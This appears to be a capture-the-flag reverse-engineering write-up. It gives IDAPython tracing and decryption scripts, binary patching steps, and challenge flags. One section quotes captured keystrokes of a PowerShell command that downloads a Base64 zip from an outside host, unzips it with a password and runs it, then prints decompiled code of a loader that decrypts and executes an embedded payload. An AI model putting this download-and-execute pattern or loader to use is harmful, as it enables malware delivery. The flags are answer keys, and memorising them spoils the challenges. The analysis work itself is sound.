    Walks backwards from start_ea for at most MAX_BACK_INSNS instructions.
    Instructions in IGNORED_MNEMS are stepped over without being counted; the
    walk stops at the first other instruction that is not a stack store with
    an immediate in 0..0x1000.
    """
    count = 0
    cur = start_ea
    for _ in range(MAX_BACK_INSNS):
        if cur == idc.BADADDR:
            break
        if mnem(cur) not in IGNORED_MNEMS:
            if not is_mov_stack_imm(cur):
                break
            if not (0 <= idc.get_operand_value(cur, 1) <= 0x1000):
                break
            count += 1
        cur = prev_insn(cur)
    return count

def get_func_size_at(ea):
    """Return (size in bytes, func object) for the function containing ea.

    Returns (-1, None) when ea does not belong to any function.
    """
    func = ida_funcs.get_func(ea)
    if func:
        return func.end_ea - func.start_ea, func
    return -1, None

def is_candidate_call(call_ea):
    """Decide whether call_ea looks like a call to a string-decrypt routine.

    Returns (matched, callee address, preceded-by-vzeroupper).  A match needs:
    a near/far call to a function whose size lies in
    FUNC_SIZE_MIN..FUNC_SIZE_MAX; immediately before it (ignoring
    IGNORED_MNEMS) immediate loads of r8d and r9d in either order; before
    those a `lea rcx, mem`; and before that a chain of at least MIN_MOV_CHAIN
    stack stores of immediates.  Any failure gives (False, None, False).
    """
    rejected = (False, None, False)

    if mnem(call_ea) != "call" or optype(call_ea, 0) not in (idc.o_near, idc.o_far):
        return rejected

    target = idc.get_operand_value(call_ea, 0)
    if target in (idc.BADADDR, 0):
        return rejected

    size, func = get_func_size_at(target)
    if func is None or not (FUNC_SIZE_MIN <= size <= FUNC_SIZE_MAX):
        return rejected

    raw_prev = prev_insn(call_ea)
    has_vzu = (raw_prev != idc.BADADDR and mnem(raw_prev) == "vzeroupper")

    # Gather the four significant instructions before the call, nearest first.
    preceding = []
    cursor = call_ea
    for _ in range(4):
        cursor = prev_sig_insn(cursor)
        preceding.append(cursor)
    if idc.BADADDR in preceding:
        return rejected
    arg_near, arg_far, buffer_lea, last_store = preceding

    loads_both_args = (
        (is_mov_reg_imm(arg_near, "r9d") and is_mov_reg_imm(arg_far, "r8d")) or
        (is_mov_reg_imm(arg_near, "r8d") and is_mov_reg_imm(arg_far, "r9d"))
    )
    if not loads_both_args:
        return rejected
    if not is_lea_rcx_mem(buffer_lea):
        return rejected
    if not is_mov_stack_imm(last_store):
        return rejected
    if count_contiguous_stack_mov_imm(last_store) < MIN_MOV_CHAIN:
        return rejected

    return True, target, has_vzu

def iter_exec_segs():
    """Yield (start, end) for every segment that has the execute permission."""
    for seg_start in idautils.Segments():
        seg = ida_segment.getseg(seg_start)
        if seg and seg.perm & ida_segment.SEGPERM_EXEC:
            yield seg.start_ea, seg.end_ea

def main():
    """Find every candidate decrypt routine, rename it and tag its call sites.

    Callees are renamed decstr_NN in ascending address order.  Each matching
    call site gets a "[dec-candidate ... -> name]" comment unless that exact
    tag is already present.  A summary is printed for the callees that were
    renamed successfully.
    """
    candidates = {}

    for seg_start, seg_end in iter_exec_segs():
        ea = seg_start
        while ea != idc.BADADDR and ea < seg_end:
            ok, target, has_vzu = is_candidate_call(ea)
            if ok:
                entry = candidates.setdefault(target, {"calls": [], "has_vzu": False})
                entry["calls"].append(ea)
                entry["has_vzu"] = entry["has_vzu"] or has_vzu
            ea = idc.next_head(ea, seg_end)

    targets = sorted(candidates)
    print(f"[+] matched targets: {len(targets)}")

    renamed = []
    for index, target in enumerate(targets):
        info = candidates[target]
        new_name = f"decstr_{index:02d}"

        if ida_name.set_name(target, new_name, ida_name.SN_NOWARN | ida_name.SN_NOCHECK):
            renamed.append((target, new_name, len(info["calls"]), info["has_vzu"]))

        # The tag is the same for every call site of this callee.
        extra = " +vzu" if info["has_vzu"] else ""
        tag = f"[dec-candidate{extra} -> {new_name}]"
        for call_site in info["calls"]:
            existing = idc.get_cmt(call_site, 0) or ""
            if tag not in existing:
                idc.set_cmt(call_site, (existing + " " + tag).strip(), 0)

    for target, name, xref_count, vzu in renamed:
        print(f" {name} @ 0x{target:X}, xrefs={xref_count}, has_vzeroupper={vzu}")

    ida_kernwin.msg("[done] rename dec candidates finished.\n")


if __name__ == "__main__":
    main()

Then trace all the strings:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
# -*- coding: utf-8 -*-
import os
import time
import struct
from collections import defaultdict

import idc
import idautils
import ida_dbg
import ida_funcs
import ida_kernwin

# NOTE(review): not referenced in the visible part of the script; presumably
# controls whether the debugger resumes after each hit -- confirm.
AUTO_CONTINUE = True
# Default number of bytes read when extracting a string from debuggee memory.
MAX_STR_READ = 0x400
# Strings shorter than this are discarded by the string readers.
MIN_PRINTABLE_LEN = 3
# NOTE(review): not referenced in the visible part of the script; presumably
# the file the trace is written to -- confirm.
LOG_PATH = r"E:/CTF/temp/dec_trace.log"
# NOTE(review): not referenced in the visible part of the script.
g_dec_trace_hooks = None

def get_reg(name):
    """Return the debugger's value of register `name`, or 0 if the read raises."""
    try:
        value = ida_dbg.get_reg_val(name)
    except Exception:
        value = 0
    return value

def dbg_read_bytes(addr, sz):
    """Read exactly `sz` bytes of debuggee memory starting at `addr`.

    Three strategies are tried in order: idc.read_dbg_memory,
    ida_dbg.read_dbg_memory (only if that attribute exists), and finally a
    byte-by-byte read through idc.read_dbg_byte.

    Returns a bytes object of length `sz`, or None when the address is
    falsy or below 0x1000, when `sz` is not positive, or when every
    strategy fails.
    """
    if not addr or addr < 0x1000 or sz <= 0:
        return None

    def _exact(blob):
        # Normalise a bulk-read result to exactly `sz` bytes; None if unusable.
        if not blob:
            return None
        if isinstance(blob, str):
            blob = blob.encode("latin-1", errors="ignore")
        if len(blob) < sz:
            return None
        return bytes(blob[:sz])

    # Strategy 1: bulk read through idc.
    try:
        chunk = _exact(idc.read_dbg_memory(addr, sz))
        if chunk is not None:
            return chunk
    except Exception:
        pass

    # Strategy 2: bulk read through ida_dbg, when that API is present.
    if hasattr(ida_dbg, "read_dbg_memory"):
        try:
            chunk = _exact(ida_dbg.read_dbg_memory(addr, sz))
            if chunk is not None:
                return chunk
        except Exception:
            pass

    # Strategy 3: one byte at a time; a single bad byte aborts the read.
    collected = bytearray()
    try:
        for offset in range(sz):
            value = idc.read_dbg_byte(addr + offset)
            if value is None or value < 0 or value > 0xFF:
                return None
            collected.append(value & 0xFF)
    except Exception:
        return None
    return bytes(collected)

def dbg_read_qword(addr):
    """Read a little-endian 64-bit value from debuggee memory at `addr`.

    idc.read_dbg_qword is preferred; if it raises or yields something that
    is not a plain 64-bit integer (or equals idc.BADADDR), the value is
    rebuilt from an 8-byte read via dbg_read_bytes.

    Returns the integer, or None when `addr` is falsy or below 0x1000 or
    the memory cannot be read.
    """
    if not addr or addr < 0x1000:
        return None

    try:
        value = idc.read_dbg_qword(addr)
        in_range = isinstance(value, int) and 0 <= value <= 0xFFFFFFFFFFFFFFFF
        if in_range and value != idc.BADADDR:
            return value
    except Exception:
        pass

    raw = dbg_read_bytes(addr, 8)
    if not raw or len(raw) < 8:
        return None
    (value,) = struct.unpack("<Q", raw)
    return value

def is_printable_ascii_text(s):
    """Heuristic: does `s` look like human-readable ASCII text?

    A string qualifies when it has at least MIN_PRINTABLE_LEN characters
    and at least 80% of them are printable ASCII (codes 32..126) or one of
    CR, LF, TAB. Empty or None input yields False.
    """
    if not s or len(s) < MIN_PRINTABLE_LEN:
        return False

    def _readable(ch):
        code = ord(ch)
        return ch in "\r\n\t" or (32 <= code <= 126)

    readable = sum(1 for ch in s if _readable(ch))
    return (readable / max(1, len(s))) >= 0.80

def read_cstr_ascii(addr, maxlen=MAX_STR_READ):
    """Try to read a NUL-terminated single-byte string at `addr`.

    Up to `maxlen` bytes are fetched, cut at the first NUL, and decoded
    first as UTF-8 and then as Latin-1 (undecodable bytes are dropped).
    The first decoding accepted by is_printable_ascii_text is returned;
    otherwise None.
    """
    raw = dbg_read_bytes(addr, maxlen)
    if not raw:
        return None

    nul_at = raw.find(b"\x00")
    body = raw if nul_at < 0 else raw[:nul_at]
    if len(body) < MIN_PRINTABLE_LEN:
        return None

    for codec in ("utf-8", "latin-1"):
        try:
            text = body.decode(codec, errors="ignore")
            if is_printable_ascii_text(text):
                return text
        except Exception:
            pass
    return None

def read_cstr_utf16le(addr, max_bytes=MAX_STR_READ):
    """Try to read a NUL-terminated UTF-16LE string at `addr`.

    `max_bytes` is rounded up to an even count. The buffer is scanned in
    2-byte steps for a 00 00 terminator; the text before it is decoded and
    accepted when it has at least MIN_PRINTABLE_LEN characters and at
    least 70% of them are printable ASCII, CR/LF/TAB, or fall in
    U+4E00..U+9FFF. Returns the string or None.
    """
    if max_bytes % 2:
        max_bytes += 1

    buf = dbg_read_bytes(addr, max_bytes)
    if not buf or len(buf) < 4:
        return None

    # Offset of the first aligned 16-bit zero, if any.
    terminator = next(
        (i for i in range(0, len(buf) - 1, 2) if buf[i] == 0 and buf[i + 1] == 0),
        None,
    )
    if terminator is None or terminator < 2:
        return None

    try:
        text = buf[:terminator].decode("utf-16le", errors="ignore")
    except Exception:
        return None

    if len(text) < MIN_PRINTABLE_LEN:
        return None

    def _acceptable(ch):
        code = ord(ch)
        return ch in "\r\n\t" or (32 <= code <= 126) or (0x4E00 <= code <= 0x9FFF)

    accepted = sum(1 for ch in text if _acceptable(ch))
    if accepted / max(1, len(text)) >= 0.70:
        return text
    return None

def try_decode_text_at_ptr(p):
    """Interpret the memory at pointer `p` as text.

    The single-byte reader is tried before the UTF-16LE reader. Returns
    ("ascii", text) or ("utf16", text) for the first reader that produces
    a string, and None when `p` is falsy or neither reader succeeds.
    """
    if not p:
        return None

    narrow = read_cstr_ascii(p)
    if narrow:
        return ("ascii", narrow)

    wide = read_cstr_utf16le(p)
    return ("utf16", wide) if wide else None

def extract_text_candidates(rax, rcx_entry):
    """Look for a decoded string reachable from RAX or the entry-time RCX.

    Four pointers are probed, in this order: the qword stored at RAX, RAX
    itself, the qword stored at the entry RCX, and the entry RCX itself.
    Among the pointers that decode to text, the one with the longest text
    wins (the earliest probe wins ties).

    Returns (best, raw8_rax, q_rax) where `best` is a
    (label, ptr, encoding, text) tuple or None, `raw8_rax` is the 8 raw
    bytes at RAX (or None) and `q_rax` is the qword at RAX (or None).
    """
    raw8_rax = dbg_read_bytes(rax, 8) if rax else None
    q_rax = dbg_read_qword(rax) if rax else None
    q_rcx = dbg_read_qword(rcx_entry) if rcx_entry else None

    probes = (
        ("[RAX]", q_rax),
        ("RAX", rax),
        ("[RCX(entry)]", q_rcx),
        ("RCX(entry)", rcx_entry),
    )

    found = []
    for label, ptr in probes:
        if not ptr:
            continue
        decoded = try_decode_text_at_ptr(ptr)
        if decoded:
            enc, txt = decoded
            found.append((label, ptr, enc, txt))

    # max() keeps the first of equally long candidates, like a stable sort.
    best = max(found, key=lambda cand: len(cand[3])) if found else None
    return best, raw8_rax, q_rax

def get_dec_funcs():
    """Collect every function whose name starts with "decstr_".

    Only names that sit exactly on a function start are kept. Returns a
    list of (start_ea, name, func) tuples ordered by address.
    """
    matches = []
    for ea, name in idautils.Names():
        if not name.startswith("decstr_"):
            continue
        func = ida_funcs.get_func(ea)
        if func and func.start_ea == ea:
            matches.append((ea, name, func))
    return sorted(matches, key=lambda entry: entry[0])

def get_ret_eas(func):
    """Return the addresses of all instructions in `func` whose mnemonic starts with "ret".

    The walk covers [func.start_ea, func.end_ea) head by head.
    """
    ret_addrs = []
    cursor = func.start_ea
    while cursor != idc.BADADDR and cursor < func.end_ea:
        mnemonic = idc.print_insn_mnem(cursor).lower()
        if mnemonic.startswith("ret"):
            ret_addrs.append(cursor)
        cursor = idc.next_head(cursor, func.end_ea)
    return ret_addrs

def add_bpt(ea):
    """Place an enabled breakpoint at `ea`, best effort.

    Any existing breakpoint is removed first. The ida_dbg API is tried
    first; if it raises or reports failure, the same sequence is repeated
    through idc. All errors are swallowed.
    """
    try:
        ida_dbg.del_bpt(ea)
    except Exception:
        pass

    try:
        placed = ida_dbg.add_bpt(ea)
        ida_dbg.enable_bpt(ea, True)
    except Exception:
        placed = False

    if placed:
        return

    # Fallback path through the idc wrappers.
    try:
        idc.del_bpt(ea)
    except Exception:
        pass
    try:
        idc.add_bpt(ea)
        idc.enable_bpt(ea, True)
    except Exception:
        pass

def del_bpt(ea):
    """Remove the breakpoint at `ea` through both ida_dbg and idc, ignoring errors."""
    for api in (ida_dbg, idc):
        try:
            api.del_bpt(ea)
        except Exception:
            pass

def cleanup_old(decs):
    """Undo a previous install: unhook, close its log file, drop its breakpoints.

    `decs` is the (start_ea, name, func) list from get_dec_funcs; the
    entry address and every ret address of each function are cleared.
    """
    global g_dec_trace_hooks

    previous = g_dec_trace_hooks
    if previous:
        try:
            previous.unhook()
        except Exception:
            pass
        try:
            if hasattr(previous, "fp") and previous.fp:
                previous.fp.close()
        except Exception:
            pass
        g_dec_trace_hooks = None

    stale = set()
    for fea, _, f in decs:
        stale.add(fea)
        stale.update(get_ret_eas(f))

    for ea in stale:
        del_bpt(ea)

    ida_kernwin.msg(f"[cleanup] removed old hook and {len(stale)} bpts\n")

# Debugger hook that logs every call to a decstr_* function: the arguments seen
# at entry and any text reachable from RAX / entry-RCX when a ret is reached.
class DecTraceHooks(ida_dbg.DBG_Hooks):
# entry_map: breakpoint ea at function start -> (func_ea, name)
# ret_map:   breakpoint ea at a ret instruction -> (func_ea, name)
# Opens LOG_PATH for writing (creating its directory if needed).
def __init__(self, entry_map, ret_map):
super().__init__()
self.entry_map = entry_map
self.ret_map = ret_map
# Per-thread stack of pending calls, pushed at entry and popped at ret.
self.ctx = defaultdict(list)

d = os.path.dirname(LOG_PATH)
if d:
os.makedirs(d, exist_ok=True)

self.fp = open(LOG_PATH, "w", encoding="utf-8", errors="ignore")
self.fp.write(f"# dec trace start: {time.ctime()}\n")
self.fp.flush()

# Print `line` and append it to the log file; write errors are ignored
# (for example after the file was closed on process exit).
def _log(self, line):
print(line)
try:
self.fp.write(line + "\n")
self.fp.flush()
except Exception:
pass

# Breakpoint callback. Handles entry breakpoints and ret breakpoints;
# any other breakpoint is ignored. Always returns 0.
def dbg_bpt(self, tid, ea):
# entry
if ea in self.entry_map:
func_ea, name = self.entry_map[ea]
rcx = get_reg("RCX")
rsp = get_reg("RSP")
# At the first instruction of the callee, [RSP] holds the return address.
caller = dbg_read_qword(rsp) if rsp else 0

self.ctx[tid].append({
"func_ea": func_ea,
"name": name,
"rcx_entry": rcx,
"caller": caller or 0,
"t": time.time(),
})

self._log(
f"[ENTRY] tid={tid} {name}@0x{func_ea:X} "
f"caller=0x{(caller or 0):X} rcx=0x{(rcx or 0):X}"
)

if AUTO_CONTINUE:
ida_dbg.request_continue_process()
ida_dbg.run_requests()
return 0

# ret
if ea in self.ret_map:
func_ea, name = self.ret_map[ea]
rax = get_reg("RAX")

# Find the most recent pending entry for this function on this thread.
ctx_item = None
stk = self.ctx.get(tid, [])
for i in range(len(stk) - 1, -1, -1):
if stk[i]["func_ea"] == func_ea:
ctx_item = stk.pop(i)
break

# Without a matching entry record, fall back to zeros.
rcx_entry = ctx_item["rcx_entry"] if ctx_item else 0
caller = ctx_item["caller"] if ctx_item else 0

hit, raw8, qrax = extract_text_candidates(rax, rcx_entry)
raw8_hex = raw8.hex() if raw8 else "None"

if hit:
label, ptr, enc, s = hit
self._log(
f"[RET ] tid={tid} {name}@0x{func_ea:X} ret_ea=0x{ea:X} "
f"caller=0x{(caller or 0):X} rax=0x{(rax or 0):X} "
f"raw8@rax={raw8_hex} [rax]=0x{(qrax or 0):X} "
f"src={label} ptr=0x{ptr:X} enc={enc} text={s!r}"
)
else:
self._log(
f"[RET ] tid={tid} {name}@0x{func_ea:X} ret_ea=0x{ea:X} "
f"caller=0x{(caller or 0):X} rax=0x{(rax or 0):X} "
f"raw8@rax={raw8_hex} [rax]=0x{(qrax or 0):X} text=<none>"
)

if AUTO_CONTINUE:
ida_dbg.request_continue_process()
ida_dbg.run_requests()
return 0

return 0

# Process-exit callback: log the exit code and close the log file.
def dbg_process_exit(self, pid, tid, ea, code):
self._log(f"# process exit code={code}")
try:
self.fp.close()
except Exception:
pass
return 0

def install():
    """Set breakpoints on every decstr_* entry and ret, then hook the debugger.

    Any previous installation is cleaned up first. Returns the new
    DecTraceHooks instance, or None when no decstr_* function exists.
    """
    decs = get_dec_funcs()
    if not decs:
        ida_kernwin.msg("[-] no decstr_* funcs found. run rename script first.\n")
        return None

    cleanup_old(decs)

    entry_map, ret_map = {}, {}
    for start, label, func in decs:
        owner = (start, label)

        entry_map[start] = owner
        add_bpt(start)

        for ret_ea in get_ret_eas(func):
            ret_map[ret_ea] = owner
            add_bpt(ret_ea)

    hooks = DecTraceHooks(entry_map, ret_map)
    hooks.hook()

    ida_kernwin.msg(f"[+] installed: {len(entry_map)} entries, {len(ret_map)} rets\n")
    ida_kernwin.msg(f"[+] log -> {LOG_PATH}\n")
    return hooks


# Install on script load and remember the hook object for the next cleanup.
g_dec_trace_hooks = install()

Notice that in log:

1
[RET ] tid=7244 decstr_03@0x7FF737A5BDA0 ret_ea=0x7FF737A5BEA7 caller=0x7FF737A9F20C rax=0x32772FFBE0 raw8@rax=000085f8f8010000 [rax]=0x1F8F8850000 src=[RAX] ptr=0x1F8F8850000 enc=utf16 text='GIVEMETHEFLAG'

Find the function:

1
2
3
*(double *)&_XMM0 = decstr_03(&v249, v94, 32, 34, 47, 30, 38, 30, 45, 33, 30, 31, 37, 26, 32);
*(double *)&_XMM0 = decstr_27(&v250, n1361808966_2, 28, 38, 40, 74, 52, 23, 1, 0, 3, 2, 52, 52, 3, 57, 75);
*(double *)&_XMM0 = decstr_09(&Str, v160, 31, 37, 26, 32, 67, 29, 34, 44, 41, 37, 26, 50);

decstr_03 decodes to GIVEMETHEFLAG: adding 0x27 to each argument byte yields the corresponding uppercase letter (e.g. 32 + 0x27 = 'G').

Applying the same +0x27 to the arguments of decstr_27 gives CMOq[>('*)[[*`r, which starts with the flag header CMO. So patch the program: pick any suitable location and patch the bytes to:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
.text:00007FF737A9F6C3                 mov     [rsp+170h+var_F0], 4Bh ; 'K'
.text:00007FF737A9F6CE mov [rsp+170h+var_F8], 39h ; '9'
.text:00007FF737A9F6D6 mov [rsp+170h+var_100], 3
.text:00007FF737A9F6DE mov [rsp+170h+var_108], 34h ; '4'
.text:00007FF737A9F6E6 mov [rsp+170h+var_110], 34h ; '4'
.text:00007FF737A9F6EE mov [rsp+170h+var_118], 2
.text:00007FF737A9F6F6 mov [rsp+170h+var_120], 3
.text:00007FF737A9F6FE mov [rsp+170h+var_128], 0
.text:00007FF737A9F706 mov [rsp+170h+var_130], 1
.text:00007FF737A9F70E mov [rsp+170h+var_138], 17h
.text:00007FF737A9F716 mov [rsp+170h+var_140], 34h ; '4'
.text:00007FF737A9F71E mov [rsp+170h+var_148], 4Ah ; 'J'
.text:00007FF737A9F726 mov dword ptr [rsp+170h+var_150], 28h ; '('
.text:00007FF737A9F72E lea rcx, [rbp+0F0h+var_A0]
.text:00007FF737A9F732 mov r8d, 1Ch
.text:00007FF737A9F738 mov r9d, 26h ; '&'
.text:00007FF737A9F73E call decstr_27 ; [dec-candidate -> decstr_027] [dec-candidate +vzu -> decstr_27]

And just run the program and watch the output.

CMO{0xbadc00d5}

What did you type

The two files are .pcap traffic captures; the larger one contains keyboard data:

1
powersh <RET>ls<RET>cd<SPACE>Docu       <RET>ls<RET>c<DEL>[]IO.File::WwriteAall ""$pwd\sus.zip,<SPACE>[]Cconvert::FfromBase64Sst(irm<SPACE>''https://0x0.st/PbWE.txt)))<RET>ls<RET>unzip<RET>unzip<SPACE>-P<SPACE>1m_g0d_!!<SPACE>sus.z <SPACE>-d<SPACE>out<RET>mv<SPACE>out\*<SPACE>.<RET>./modu       <RET>rm<SPACE>*<RET>exit<RET>

This downloads a Base64-encoded zip from https://0x0.st/PbWE.txt and writes it to sus.zip; the password of the zip is 1m_g0d_!!.

There’s an exe in the zip:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
// Entry point (decompiler output). Hashes the computer name, compares the
// hash with one fetched by GETSHA256FROMWEB, then uses the same hash as the
// AES key to decrypt an embedded resource and hands the result on.
int __fastcall main(int argc, const char **argv, const char **envp)
{
memset(Buffer, 0, sizeof(Buffer));
nSize[0] = 256;
memset(buf, 0, sizeof(buf));
memset(buf_, 0, 0x21u);
GetComputerNameA(Buffer, nSize);
// Inline strlen(Buffer).
n0x40 = -1;
do
++n0x40;
while ( Buffer[n0x40] );
SHA256(Buffer, n0x40, (__int64)buf);
GETSHA256FROMWEB(buf_);
// Exit unless all 32 hash bytes match the fetched value.
for ( n32 = 0; n32 < 32; ++n32 )
{
if ( *((unsigned __int8 *)buf + n32) != *((unsigned __int8 *)buf_ + n32) )
exit(0);
}
LODWORD(p_count) = 0;
// src points at the resource data, p_count receives its size.
src = sub_140003A50((DWORD *)&p_count);
Size = (unsigned int)(p_count + 1);
if ( (_DWORD)p_count == -1 )
Size = -1;
buf_1 = malloc(Size);
memset(buf_1, 0, (unsigned int)p_count);
qmemcpy(buf_1, src, (unsigned int)p_count);
// The SHA-256 of the computer name (buf) is the key material.
AES_KEYSCHEDULE((__int64)v13, (__int64)buf, &src_);
AES_256((__int64)v13, (char *)buf_1, (unsigned int)p_count);
if ( !buf_1 )
return -1;
// sub_140003830 returns 0 or the 16-bit field at offset 24 of the PE headers.
n523 = sub_140003830(buf_1);
if ( n523 && n523 != 523 )
return 0;
memset(buf__1, 0, sizeof(buf__1));
buf__1[0] = buf_1;
buf__1[1] = (void *)(unsigned int)p_count;
LOBYTE(buf__1[2]) = 0;
sub_1400039E0(buf__1);
if ( buf__1[0] )
{
free_ww(buf__1[0]);
buf__1[0] = 0;
}
return 0;
}

From the network traffic, the AES key is 66c9c5a2015ff2be075f3d430031f54d22f8ad7194363889a019350937946d74, which is the SHA256 of the computer name THE-EMPEROR. Next, sub_140003A50:

1
2
3
4
5
6
7
// Locates the resource with name 0xFE and type 0xFF in the current module,
// stores its size in *p_count and returns a pointer to its data.
LPVOID __fastcall sub_140003A50(DWORD *p_count)
{
hResInfo = FindResourceA(0, (LPCSTR)0xFE, (LPCSTR)0xFF);
hResData = LoadResource(0, hResInfo);
*p_count = SizeofResource(0, hResInfo);
return LockResource(hResData);
}

It loads a resource embedded in the file (name 0xFE, type 0xFF). Next, sub_140003830:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
// Returns the 16-bit value at byte offset 24 from the PE signature of the
// image in buf, or 0 if buf does not pass the MZ/PE checks of sub_140003700.
// NOTE(review): offset 24 is where OptionalHeader.Magic sits in a standard
// PE header (523 == 0x20B == PE32+) - confirm.
__int64 __fastcall sub_140003830(_DWORD *buf)
{
lp = (unsigned __int16 *)sub_140003700(buf, 0);
if ( !lp )
return 0;
if ( IsBadReadPtr_w(lp, 0xF8u) )
return 0;
return lp[12];
}

// Validates that buf starts with an MZ header and returns the address of its
// PE signature, or 0 on any failure. When n64 is non-zero the range checks go
// through sub_140003580 (n64 presumably being the buffer size - confirm);
// otherwise IsBadReadPtr_w is used.
__int64 __fastcall sub_140003700(_DWORD *buf, unsigned __int64 n64)
{
if ( !buf )
return 0;
if ( n64 )
{
if ( !sub_140003580((unsigned __int64)buf, n64, (unsigned __int64)buf, 0x40u) )
return 0;
}
else if ( IsBadReadPtr_w(buf, 0x40u) )
{
return 0;
}
if ( *(_WORD *)buf != 0x5A4D ) // MZ
return 0;
// DWORD index 15 is byte offset 0x3C (e_lfanew); offsets above 1024 are rejected.
n1024 = buf[15];
if ( n1024 > 1024 )
return 0;
buf_1 = (_DWORD *)((char *)buf + n1024);
if ( n64 )
{
if ( !sub_140003580((unsigned __int64)buf, n64, (unsigned __int64)buf_1, 0xF8u) )
return 0;
}
else if ( IsBadReadPtr_w(buf_1, 0xF8u) )
{
return 0;
}
if ( *buf_1 == 0x4550 ) // PE
return (__int64)buf + n1024;
else
return 0;
}

So the decrypted resource is an exe or shellcode. However, there’s no need to analyze the shellcode. The files in the traffic are also encrypted with AES-256-CBC: the first 4 bytes are the key, with AES key = SHA256(KEY) and iv = 0F0E0D0C0B0A09080706050403020100.

CMO{Dumb357_P3r50n_1n_7h3_M1lky_W4y_!!!}

A Matter of Time

The program’s code is heavily obfuscated, but its basic structure is unchanged. Debug and trace it to find the call chain.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
0x140009188 Start
0x140017A8E call 0x140009854 _security_init_cookie()
0x140009195 jmp 0x1400217E4 __scrt_common_main_seh()
0x1400217F8 call 0x140008CE8 __scrt_initialize_crt()
0x14000904F jp 0x14002184F __scrt_common_main_seh()+0x43
0x140021867 call _initterm_e
0x140009080 jnb 0x1400218DA __scrt_common_main_seh()+0x6e
0x1400218E8 call _initterm
; → The 'First_' array contains:
; .rdata:0x14000B4C0 dq offset 0x140008FF0
; .rdata:0x14000B4C8 dq offset 0x140001000
; 0x140008FF0:
; sub rsp, 0x28
; call addr1 → lea rcx, 0x1400097F4: TopLevelExceptionFilter; jmp SetUnhandledExceptionFilter → terminate()
; call addr2 → xor eax, eax
; mov ecx,eax
; add rsp, 0x28
; jmp _set_new_mode
; 0x140001000: load 96 bytes cipher → decrypt to readable hex 4c4635258cf6eca5d80b8e050a9e5b04f1a9c979bc55f3f4773971ed2f81a96967bb3569fa002f549cc970a18779b3a7
0x1400090FC jns 0x140021A28 __scrt_common_main_seh()+0xEA
0x140021A45 call 0x140004290 main
0x1400042CE ja 0x14001CFD3 ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A
0x1400044AD ja 0x14001D316 ; load cipher and decrypt
0x14001D39F call 0x1400073A8 print()
0x14001D3A4 call getchar()
0x14001D3EB cmp eax, 698FBB00h ; cmp a value with 698FBB00h

At 0x14001D3EB, eax holds a value that looks very much like a timestamp, but it only changes once every several minutes. Debugging shows that the program is actually reading a file’s time, that of C:\Windows\System32\winevt\Logs\System.evtx. Continuing:

1
2
3
4
0x14001D3F0 jmp 0x140004554
0x140004554 jbe 0x14001D772 ; < 698FBB00h ; Extra output: "Ah yes, you either snuck in to review things before the CTF, or you're just playing games with the dates. Very recreational."
0x14000455A jbe 0x14001D3F7
0x140004560 ja 0x14001D41D ; > 698FBB00h

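Note that all printable strings in the program are loaded from xmmword constants into XMM registers, and each byte is decrypted as cipher[i] XOR ((key + i) & 0xFF) with a single-byte key. The following script finds these blocks and brute-forces the key: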

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
import idautils
import idaapi
import idc
import string

def is_printable(s):
    """Return True when byte string `s` is non-empty and every byte is in string.printable."""
    if len(s) == 0:
        return False
    allowed = string.printable.encode()
    return all(byte in allowed for byte in s)

def decrypt_with_key(data, key):
    """XOR each byte of `data` with a rolling key.

    Byte i is XORed with (key + i) & 0xFF. Returns the result as bytes.
    """
    return bytes(byte ^ ((key + pos) & 0xFF) for pos, byte in enumerate(data))

def get_segment_by_name(name):
    """Return the start address of the first segment called `name`, or None."""
    for start in idautils.Segments():
        segment = idaapi.getseg(start)
        if not segment:
            continue
        if idaapi.get_segm_name(segment) == name:
            return start
    return None

def get_rbp_offset(op):
    """Return the displacement of an rbp-relative operand, else None.

    Only operands of type o_displ whose base register is rbp qualify; the
    raw (not sign-extended) op.addr is returned.
    """
    is_rbp_displ = op.type == idaapi.o_displ and op.reg == idaapi.str2reg("rbp")
    return op.addr if is_rbp_displ else None

def sign_extend(value, bits=64):
    """Reinterpret `value` as a two's-complement integer of width `bits`.

    If the sign bit (bit bits-1) is set, 2**bits is subtracted; otherwise
    the value is returned unchanged.
    """
